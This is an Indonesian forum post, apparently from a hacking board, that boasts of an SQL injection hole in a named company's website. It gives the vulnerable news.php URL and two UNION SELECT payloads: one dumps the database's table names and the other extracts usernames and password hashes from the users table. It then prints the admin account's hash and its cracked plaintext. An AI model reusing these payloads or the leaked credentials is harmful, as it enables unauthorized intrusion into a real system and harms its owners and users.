:devil :devil :devil
trus ketemu bug sqli di http://www.nexian.co.id/, ini holenya
Code: Select all
http://www.nexian.co.id/news.php?mod=article&id=47
Code: Select all
http://www.nexian.co.id/news.php?mod=article&id=-47%20union%20select%20all%201,group_concat%28table_name%29,3,4%20from%20information_schema.tables%20where%20table_schema=database%28%29--
Code: Select all
about,accessories,application,articles,career,commercial,contact,contactinfo,db_city,db_province,dealer,faq,music,product,type,users,wallpaper
Code: Select all
http://www.nexian.co.id/news.php?mod=article&id=-47%20union%20select%20all%201,group_concat%28username,0x3a,password%29,3,4%20from%20users
Code: Select all
admin:098f6bcd4621d373cade4e832627b4f6
Code: Select all
098f6bcd4621d373cade4e832627b4f6 => test
:kaca: :kaca: :kaca: